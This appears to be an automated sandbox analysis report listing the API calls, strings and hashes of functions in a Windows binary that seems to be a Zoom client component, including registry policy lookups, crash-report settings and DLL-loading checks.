                • Opcode Fuzzy Hash: 716f91f16fc37a328361c481a8eba463c19df3cf02dee33d32ce8487aaf94a0c
                • Instruction Fuzzy Hash: 31F03171640311ABD7209F79AC08B5677AABB98B52F084829F945D3390DF308802C671
                APIs
                  • Part of subcall function 00C57B52: __EH_prolog3.LIBCMT ref: 00C57B59
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,9FB8111D), ref: 00CAE849
                • OutputDebugStringA.KERNEL32(?,?,9FB8111D), ref: 00CAE880
                  • Part of subcall function 00CAE0AD: __EH_prolog3_GS.LIBCMT ref: 00CAE0B7
                  • Part of subcall function 00CAE0AD: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000294,00CAE9BE,?,?), ref: 00CAE0E4
                  • Part of subcall function 00CAE0AD: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CAE1C1
                  • Part of subcall function 00CAE0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CAE1D3
                  • Part of subcall function 00CAE0AD: CloseHandle.KERNEL32(?), ref: 00CAE1DF
                  • Part of subcall function 00CAE0AD: CloseHandle.KERNEL32(?), ref: 00CAE1EB
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                • ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NPB_WW4LoggingDestination@1@W4LogLockingState@1@W4OldFileDeletionState@1@W4LogEncryptPolicy@1@K@Z.RWSNDPQSKZ(?,00000000,00000000,?,?), ref: 00CAE91D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?), ref: 00CAE99F
                • SetLastError.KERNEL32(?,?), ref: 00CAE9D4
                Similarity
                • API ID: CloseCmm@@FileHandleLoggingState@State@1@Unlock@$BaseCreateDeallocateDebugDeletionDestination@1@EncryptErrorG@logging@@H_prolog3H_prolog3_Impl_built_with_InitLastLockingModuleNameObjectOutputPolicy@1@ProcessSingleStringWait
                • String ID:
                • API String ID: 3033691180-0
                • Opcode ID: 10f9560c4b84dd5bb5f9d70e48d7faf32f3cffced70cd0aa07e0aac9fa9777d9
                • Instruction ID: 5bb6c4406f6ffd56742b5e1e0d45a76ea8bdb36c011462fdf977d6e8cc22c326
                • Opcode Fuzzy Hash: 10f9560c4b84dd5bb5f9d70e48d7faf32f3cffced70cd0aa07e0aac9fa9777d9
                • Instruction Fuzzy Hash: C8519331A0021ADFCF14EFA4DC45AEEB7B9FF05714F444129E916E3251DB34AA49DBA0
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CE2110
                • GetPrivateProfileStringW.KERNEL32(Settings,CrashRptVersion,00D34CD0,?,00000400), ref: 00CE2161
                  • Part of subcall function 00CDCC2E: __EH_prolog3.LIBCMT ref: 00CDCC35
                Strings
                Similarity
                • API ID: H_prolog3H_prolog3_PrivateProfileString
                • String ID: CrashRptVersion$Settings
                • API String ID: 3381506161-2410450273
                • Opcode ID: 421a8f933cc94904a6c39edd70b44d39c26171df7528cba8a20f1e193becb2fd
                • Instruction ID: 524ba1a1c82291299f77565fa4a382747be6655d1823e3f3f40a331c84345c5b
                • Opcode Fuzzy Hash: 421a8f933cc94904a6c39edd70b44d39c26171df7528cba8a20f1e193becb2fd
                • Instruction Fuzzy Hash: F9F062B094035C6EDB10AF569D45ADEB6FDBF84300F44C4ADB148A7240DEB04A869FE0
                APIs
                • ?cmm_memset_s@Cmm@@YAHPAXIHI@Z.RWSNDPQSKZ(00000000,?,00000000,?), ref: 00C663C9
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(00000008), ref: 00C663E7
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(00000008), ref: 00C6647C
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(00000008), ref: 00C6649D
                Similarity
                • API ID: V?$_$Cmm@@$?rbegin@?$Simple_types@_StringString_const_iterator@String_val@U?$_V?$reverse_iterator@W@std@@@std@@@std@@@std@@$?cmm_memset_s@
                • String ID:
                • API String ID: 3748862334-0
                • Opcode ID: cd934b48ad3356f0af8cac3307eab27265feb79a558b2c7c8a6232557efbb07c
                • Instruction ID: b8e5826b4fb3d68157e0891f7fde8d1b54b68cd2d5e3fa32825b599d9a491c86
                • Opcode Fuzzy Hash: cd934b48ad3356f0af8cac3307eab27265feb79a558b2c7c8a6232557efbb07c
                • Instruction Fuzzy Hash: A351E231A00109DFCB35DF69C9D09BEB7B5EB81744BA085A9D452AB240DB30EE93DBD0
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(00CE0360,?,?,?,?,00CDE560,?,00000000,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000), ref: 00CDECBD
                Strings
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID: Success.$Unspecified error.:%x
                • API String ID: 3192549508-2677431836
                • Opcode ID: 35315d922e8f918d0e29d488565a389706568855912ac08fe718b45b7c06ca22
                • Instruction ID: bc2bbdb1da5975d473669e7139b7dcf06e70e632c4f916206a16392eea0c1e02
                • Opcode Fuzzy Hash: 35315d922e8f918d0e29d488565a389706568855912ac08fe718b45b7c06ca22
                • Instruction Fuzzy Hash: 4F11EB716847066EE3247FA99847B6673D09F00710F14442FFB99592D3EFE1548095B5
                APIs
                  • Part of subcall function 00C521B2: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00C5100A), ref: 00C521B8
                  • Part of subcall function 00C521B2: GetLastError.KERNEL32(?,00000000,00000000,?,00C5100A), ref: 00C521C2
                • IsDebuggerPresent.KERNEL32(?,?,?,00C5158A), ref: 00CE469D
                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C5158A), ref: 00CE46AC
                Strings
                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CE46A7
                Similarity
                • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                • API String ID: 3511171328-631824599
                • Opcode ID: 4e9af43a411315fe68a03e03406ab6756817b170861ca80c3f958b623f9ae8a8
                • Instruction ID: 55185a093a9e5f23f47fbb5c5816155f95ee477f86503beacacea1a6efb78b41
                • Opcode Fuzzy Hash: 4e9af43a411315fe68a03e03406ab6756817b170861ca80c3f958b623f9ae8a8
                • Instruction Fuzzy Hash: 0FE06D742007908FC320AF69E4187477AE4AF15745F00C82DF8A2C6350DBB4D88C8BB5
                APIs
                  • Part of subcall function 00C5A986: __EH_prolog3.LIBCMT ref: 00C5A98D
                  • Part of subcall function 00C5A986: std::_Lockit::_Lockit.LIBCPMT ref: 00C5A997
                  • Part of subcall function 00C5A986: int.LIBCPMT ref: 00C5A9AE
                  • Part of subcall function 00C5A986: std::_Lockit::~_Lockit.LIBCPMT ref: 00C5AA08
                • Concurrency::cancel_current_task.LIBCPMT ref: 00CCF88F
                Strings
                • 0123456789ABCDEFabcdef-+XxPp, xrefs: 00CCE9CF
                Similarity
                • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                • String ID: 0123456789ABCDEFabcdef-+XxPp
                • API String ID: 4244582100-3606100449
                • Opcode ID: 2bdcd8f997bbc4f1e4b97d64cabdc4749f76e802537d8934886502b168281416
                • Instruction ID: 11178a090e41b9d9060235ab0fccab76f3e7889e169d1d4fb1731bdd67a6e422
                • Opcode Fuzzy Hash: 2bdcd8f997bbc4f1e4b97d64cabdc4749f76e802537d8934886502b168281416
                • Instruction Fuzzy Hash: A6C29074604244CFDB25CF29C490FA9BBF2AF56314F2885ADD8A58B292D331ED87DB50
                APIs
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00D265C0), ref: 00CFE22E
                • _free.LIBCMT ref: 00CFE21C
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00CFE3E8
                Similarity
                • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                • String ID:
                • API String ID: 2155170405-0
                • Opcode ID: 7bd6fbbf5ba6f6677b3253943a599e90208f3dae79d908d021c3adcbf26d4254
                • Instruction ID: 2f3fb7263365d36fdf72320f0d6d8119d640eec10a6b0251311853735c0fc5e8
                • Opcode Fuzzy Hash: 7bd6fbbf5ba6f6677b3253943a599e90208f3dae79d908d021c3adcbf26d4254
                • Instruction Fuzzy Hash: 1E51C572900319ABCB50EF69CC819BE77BCEF41314B15416AE624E72E1E7309E44CB72
                APIs
                • __EH_prolog3.LIBCMT ref: 00C78047
                • ??0Channel@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@01@PAX@Z.RWSNDPQSKZ(?,?,?,00000008), ref: 00C78074
                • InitializeCriticalSection.KERNEL32(?,?,?,?,00000008), ref: 00C78088
                Similarity
                • API ID: ChannelChannel@ssb_ipc@@CriticalH_prolog3InitializeListener@01@Mode@1@Section
                • String ID:
                • API String ID: 3297177522-0
                • Opcode ID: 895d56c6b0b477f5191eca19187e2be32fc7544d3ebd2a86073beb7c633a618b
                • Instruction ID: cdee40bdda7f1d9e539dc756e03b9953e4221665f19015d2ef6e9dcfd8e9e305
                • Opcode Fuzzy Hash: 895d56c6b0b477f5191eca19187e2be32fc7544d3ebd2a86073beb7c633a618b
                • Instruction Fuzzy Hash: DBF0A97490070AAECB21DF94C5409AEBBB0FF00704F04811CA8499B311CBB09E49EB61
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00CED4E1), ref: 00D0017F
                Strings
                • GetSystemTimePreciseAsFileTime, xrefs: 00D00165
                Similarity
                • API ID: Cmm@@State@Unlock@
                • String ID: GetSystemTimePreciseAsFileTime
                • API String ID: 3914272143-595813830
                • Opcode ID: 4b1d6414eb2a014e821128ea236b4f9db8ce91aec6f28f343ded4d0669569ad1
                • Instruction ID: d549265f3c80bb800f22c0def8082ad8cf7a52d6ccf75bd081df3b2edc350f8d
                • Opcode Fuzzy Hash: 4b1d6414eb2a014e821128ea236b4f9db8ce91aec6f28f343ded4d0669569ad1
                • Instruction Fuzzy Hash: A2E0C23278033877C23126847C06FEABE15DB50BB5F040062FA0896280DA71091A86F5
                APIs
                • FindFirstFileW.KERNEL32(?,9FB8111D), ref: 00CBE0DD
                • FindClose.KERNEL32(00000000), ref: 00CBE0E9
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: dbd7e2a485fa2518c939f77dfd20b818e9895bfa44d33d09c25dd58bd23d2529
                • Instruction ID: ab258b08d2391e9008fda8b3eb15d8d87eec0b5518b9e47c3a546c5199aea2e3
                • Opcode Fuzzy Hash: dbd7e2a485fa2518c939f77dfd20b818e9895bfa44d33d09c25dd58bd23d2529
                • Instruction Fuzzy Hash: EEF0E5701147448BC320EB38DC4AA9BB3DAEBC8324F408B19A4A9C62D0EF38D506C6D2
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,-00000050,?,?,?,00CFD7E1,?,20001004,00000000,00000002,?,?,00CFCDCC,?,?), ref: 00D00135
                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CFD7E1,?,20001004,00000000,00000002,?,?,00CFCDCC), ref: 00D0014A
                Similarity
                • API ID: Cmm@@InfoLocaleState@Unlock@
                • String ID:
                • API String ID: 2747073063-0
                • Opcode ID: a0796e5e469711b8f99813da70ad1238ca6afa814a79988ad1ffb2511bc4d68b
                • Instruction ID: 0e3b5486efed5345fc90b7d4193ad742c1e925233c5c26372c14eac46f94fbea
                • Opcode Fuzzy Hash: a0796e5e469711b8f99813da70ad1238ca6afa814a79988ad1ffb2511bc4d68b
                • Instruction Fuzzy Hash: CAE04F3250032CBBCF126F60DC04BEE7F2AEF44761F044024FD09A6260CB329962ABB5
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D00962,?,?,00000008,?,?,00D0D105,00000000), ref: 00D00B94
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 2c23b94f38b14dc9e27e480148db5b99fcd984298845085132c4a85146853067
                • Instruction ID: 1925f872d03cb7e9de9d06afe36ff37e9b570c087e2702c5686712cd1f726099
                • Opcode Fuzzy Hash: 2c23b94f38b14dc9e27e480148db5b99fcd984298845085132c4a85146853067
                • Instruction Fuzzy Hash: 76B11731610609AFD718CF28C48ABA57FA0FF45365F298658E89ACF2E1C335E981CB50
                APIs
                • ?cmm_memset_s@Cmm@@YAHPAXIHI@Z.RWSNDPQSKZ(00000000,?,00000000,?,?,?,?,?,?), ref: 00C66559
                Similarity
                • API ID: ?cmm_memset_s@Cmm@@
                • String ID:
                • API String ID: 124908343-0
                • Opcode ID: 4430dc4690a800843cd062b240c2ddf9581fa443f1696da07db198a2fa7266fc
                • Instruction ID: a4309a873adc01eda8e84eb8be078da750ef52d3d312b1719569c6e7aaad8fbb
                • Opcode Fuzzy Hash: 4430dc4690a800843cd062b240c2ddf9581fa443f1696da07db198a2fa7266fc
                • Instruction Fuzzy Hash: D5512B71A00916DFDB39CE69E4E167DBB72EB41300F60426DD1035B285CB31EE82C785
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAC9F7
                  • Part of subcall function 00CAC031: __EH_prolog3.LIBCMT ref: 00CAC038
                  • Part of subcall function 00CAC031: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001,?,?,?), ref: 00CAC0EE
                Similarity
                • API ID: H_prolog3$CompletionCreatePort
                • String ID:
                • API String ID: 2385030332-0
                • Opcode ID: 616d92cdc930c45af1317f1e196b59961b277438a9d6c4aee956e1c7b58f80e0
                • Instruction ID: daf4ce95fa77dccf20e535627657bde1e099ee4d51d61dfe3b498eb2cda86d63
                • Opcode Fuzzy Hash: 616d92cdc930c45af1317f1e196b59961b277438a9d6c4aee956e1c7b58f80e0
                • Instruction Fuzzy Hash: 25E04F71A04289EFDF05AF64D8026AD7BA1FF04750F10841DFA654E2A1DBF24D60EB55
                APIs
                • __EH_prolog3.LIBCMT ref: 00CACA47
                  • Part of subcall function 00CAC13A: __EH_prolog3.LIBCMT ref: 00CAC141
                  • Part of subcall function 00CAC13A: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00CAC1DC
                Similarity
                • API ID: H_prolog3$CompletionCreatePort
                • String ID:
                • API String ID: 2385030332-0
                • Opcode ID: 4608e1862c8254c2de847c03b28e4c3a848021ada51e5db4edf723b557560f23
                • Instruction ID: b69d374313fe1e676b486b8c807977baaa35ef920c3a54c2b4c29543320cc76e
                • Opcode Fuzzy Hash: 4608e1862c8254c2de847c03b28e4c3a848021ada51e5db4edf723b557560f23
                • Instruction Fuzzy Hash: A4E04F71A04285EFDB05AF64880266D7BB0EB00714F10801DFA654E2A1DBF14950E754
                Strings
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: 14039a56e3f464b9ca6efe7f98f93a9b9add74b3526c9c49eb1dd60acfb9e597
                • Instruction ID: 33ef0f2d97dd58ff285034e8c44cdc279152e8fb267a5868cc07c339dd95ac94
                • Opcode Fuzzy Hash: 14039a56e3f464b9ca6efe7f98f93a9b9add74b3526c9c49eb1dd60acfb9e597
                • Instruction Fuzzy Hash: B7617A716003C85BDB3CAAAB88C2BBE73A5EF45740F14442EE562DB282D7259F43E745
                APIs
                  • Part of subcall function 00CE4DFA: EnterCriticalSection.KERNEL32(00DFECA8,00DFFC98,00DFFC8C,?,00C62BE7,00DFFC8C), ref: 00CE4E05
                  • Part of subcall function 00CE4DFA: LeaveCriticalSection.KERNEL32(00DFECA8,?,00C62BE7,00DFFC8C), ref: 00CE4E42
                • GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CE4DB0: EnterCriticalSection.KERNEL32(00DFECA8,00DFFC8C,?,00C62C03,00DFFC8C), ref: 00CE4DBA
                  • Part of subcall function 00CE4DB0: LeaveCriticalSection.KERNEL32(00DFECA8,?,00C62C03,00DFFC8C), ref: 00CE4DED
                  • Part of subcall function 00CE4DB0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00DFECA0,?,00DFFC8C), ref: 00CE4E5E
                Similarity
                • API ID: CriticalSection$EnterLeave$Cmm@@HeapProcessState@Unlock@
                • String ID:
                • API String ID: 1941490770-0
                • Opcode ID: 8a1ad3d26bc49fe71abf49a0ce80ec21717a65aa2ea42e1043040072e0b13200
                • Instruction ID: 30f9303ede0dcaf771bb49b3a8dcd321e66c2346a14892a8115329c9deb70c0a
                • Opcode Fuzzy Hash: 8a1ad3d26bc49fe71abf49a0ce80ec21717a65aa2ea42e1043040072e0b13200
                • Instruction Fuzzy Hash: 58113D7254036D8BC7259F29FCC677937A0AF05325F15812AEA14D63A1CF745586CB38
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e9bcbc2cbe3154230093a718128496b1e0d34c3dc8718325a25dec56985ce24
                • Instruction ID: 888bf515e6a0d17ab3417d77ad8d0f234f12070d925cb58d6639eeee8ae4efcc
                • Opcode Fuzzy Hash: 8e9bcbc2cbe3154230093a718128496b1e0d34c3dc8718325a25dec56985ce24
                • Instruction Fuzzy Hash:
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ab011f3c062ee7639fc976f3fb0a9e47e1732ceccd91588fbd1b997de18e2e3
                • Instruction ID: 8d2b238e8ab9779fd1ee24186670f781e7bf5bc095627fca8fe1086e0dbe207c
                • Opcode Fuzzy Hash: 2ab011f3c062ee7639fc976f3fb0a9e47e1732ceccd91588fbd1b997de18e2e3
                • Instruction Fuzzy Hash:
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b29dbfec2aa8de6e100f41c1f6adce7d16bfbc6a18b10b175c7d0a9cd5e41d94
                • Instruction ID: 1c7530cb3a4ca137cb99cb688a131fe87ac67b328cb8781c33be93b6f57c70ca
                • Opcode Fuzzy Hash: b29dbfec2aa8de6e100f41c1f6adce7d16bfbc6a18b10b175c7d0a9cd5e41d94
                • Instruction Fuzzy Hash:
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f4365c08eb74db0b3b49df71391612f75b5ef5d65ccebcef4567d277e6d04c6
                • Instruction ID: 0e279576e45c5771a5c4fd631f471fccf7c07b54fddb27d85e432a74eca785a3
                • Opcode Fuzzy Hash: 2f4365c08eb74db0b3b49df71391612f75b5ef5d65ccebcef4567d277e6d04c6
                • Instruction Fuzzy Hash:

                Control-flow Graph
                • Function starting at cd4250 (graph not reproduced; node legend: Executed / Not Executed)
                APIs
                • SetDllDirectoryW.KERNEL32(00D34CD0), ref: 00CD4271
                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CD42A7
                • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00CD42B3
                • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00CD42BF
                • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00CD42CB
                • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00CD42DA
                • GetLastError.KERNEL32(?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD42E4
                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00CD4330
                • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 00CD433C
                • VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 00CD434B
                • LoadLibraryExW.KERNEL32(cryptnet.dll,00000000,00000800,SOFTWARE\Microsoft\Cryptography\Defaults\Provider,Image Path,SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv,Dll,?,?,00000001,00000001,?,?,00000010,00000003), ref: 00CD440F
                • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4422
                • OpenProcessToken.ADVAPI32(00000000,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4429
                • GetTokenInformation.ADVAPI32(0000011C,00000014(TokenIntegrityLevel),?,00000004,?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003), ref: 00CD444D
                • CloseHandle.KERNEL32(?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4463
                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Policies\Zoom\Zoom Meetings\General,00000000,00020019,?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003), ref: 00CD4489
                • RegGetValueW.ADVAPI32(?,00000000,Disable3rdModuleVerify,0000FFFF,00000006,?,?,?,?,00000001,00000001,?,?,00000010,00000003), ref: 00CD44C2
                • RegCloseKey.ADVAPI32(?,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD44CE
                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,?,?,?,00000118,?,?), ref: 00CD4537
                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000118,?,?), ref: 00CD4596
                • CreateFileA.KERNEL32(?,10000000,00000003,00000000,00000002,00000080,00000000), ref: 00CD45CA
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000118,?,?), ref: 00CD45DB
                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD4602
                • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 00CD461D
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CD4630
                • CreateThread.KERNEL32(00000000,00000000,00CD5F00,00DEF0D0,00000004,00000000), ref: 00CD4659
                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000118,?,?), ref: 00CD4673
                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD4696
                • GetProcAddress.KERNEL32(00000000,LdrRegisterDllNotification), ref: 00CD46A8
                • GetProcAddress.KERNEL32(00000000,LdrUnregisterDllNotification), ref: 00CD46B6
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00CD5990,00DEF0D0,00DF1084,?,?,00000001,00000001,?,?,00000010,00000003,?,00000020,00000003), ref: 00CD46D7
                Similarity
                • API ID: ConditionCreateMask$CloseHandle$AddressDirectoryFileInfoOpenProcProcessThreadTokenVerifyVersion$Cmm@@CurrentErrorEventFolderInformationLastLibraryLoadModulePathResumeSemaphoreSpecialState@Unlock@Value
                • String ID: Disable3rdModuleVerify$Dll$Image Path$LdrRegisterDllNotification$LdrUnregisterDllNotification$SOFTWARE\Microsoft\Cryptography\Defaults\Provider$SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv$SOFTWARE\Policies\Zoom\Zoom Meetings\General$Zoom$\appsafecheck.txt$cryptnet.dll$ntdll.dll
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA0CAA
                • GetDynamicTimeZoneInformation.KERNEL32(?), ref: 00CA0D02
                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones,00000000,00020019,?), ref: 00CA0D25
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00CA0D56
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?), ref: 00CA0D69
                • RegCloseKey.ADVAPI32(?,?), ref: 00CA0D74
                • RegEnumKeyExW.ADVAPI32 ref: 00CA0E9B
                • RegCloseKey.ADVAPI32(?), ref: 00CA0EC5
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(UTC), ref: 00CA11EF
                Strings
                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones, xrefs: 00CA0D1B
                • Russia TZ 9 Standard Time, xrefs: 00CA106A
                • Israel Standard Time, xrefs: 00CA1162
                • Malay Peninsula Standard Time, xrefs: 00CA11AB
                • Jerusalem Standard Time, xrefs: 00CA112A
                • Russia TZ 4 Standard Time, xrefs: 00CA0F62
